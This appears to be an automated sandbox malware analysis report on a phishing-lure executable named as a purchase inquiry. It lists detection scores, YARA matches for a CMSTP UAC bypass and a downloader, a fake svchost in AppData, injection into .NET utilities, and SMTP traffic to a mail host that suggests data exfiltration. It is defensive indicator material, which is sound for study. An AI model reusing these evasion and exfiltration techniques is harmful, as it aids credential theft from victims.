                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeReversingLabs: Detection: 36%
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeVirustotal: Detection: 25%Perma Link
                    Machine Learning detection for sample
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeJoe Sandbox ML: detected

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 0000000A.00000002.1920918632.000002168033C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1993738956.000001A48033C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.1950991965.0000028E8033C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1664238561.000002091F69C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe PID: 7520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7792, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7872, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7748, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8396, type: MEMORYSTR
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49759 version: TLS 1.2
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb1 source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbv source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, vexplorers.exe, 00000034.00000000.1950262138.00000000008B2000.00000002.00000001.01000000.0000000B.sdmp, vexplorers.exe.15.dr
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: .pdbHJ source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WERBC7D.tmp.dmp.31.dr
                    Source: Binary string: System.Windows.Forms.pdb` source: WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008517923.000001A4FFF58000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Core.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, vexplorers.exe, 00000034.00000000.1950262138.00000000008B2000.00000002.00000001.01000000.0000000B.sdmp, vexplorers.exe.15.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000008.00000002.2007386416.000001A4FE0AC000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB@ source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Drawing.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbp^y source: WERD370.tmp.dmp.40.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: 91\??\C:\Windows\symbols\dll\mscorlib.pdbx source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF76000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb\??\C:\Windows\mscorlib.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb- source: WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: svchost.PDB source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\mscorlib.pdban) source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: mscorlib.pdbSystem.Windows.Forms.ni.dllMZ source: WERBC7D.tmp.dmp.31.dr
                    Source: Binary string: mscorlib.pdb@Yx source: WERD370.tmp.dmp.40.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 4x nop then jmp 00007FFD9B8B22DFh0_2_00007FFD9B8B0620
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 4x nop then jmp 00007FFD9B8B46FCh0_2_00007FFD9B8B44F5
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8822DFh8_2_00007FFD9B880620
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8846FCh8_2_00007FFD9B8844F5
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8A22DFh10_2_00007FFD9B8A19A9
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8A46FCh10_2_00007FFD9B8A44F5
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8722DFh27_2_00007FFD9B870620
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8746FCh27_2_00007FFD9B87451C
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8B22DFh41_2_00007FFD9B8B0620
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then jmp 00007FFD9B8B46FCh41_2_00007FFD9B8B44F5

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 185.230.214.164:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 185.230.214.164:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: smtp.zoho.eu
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2874066632.0000000001001000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
                    Source: InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: svchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2868061435.0000000000437000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2874066632.0000000001001000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, 00000000.00000002.1664238561.000002091F998000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.zoho.eu
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://status.thawte.com0:
                    Source: Amcache.hve.18.drString found in binary or memory: http://upx.sf.net
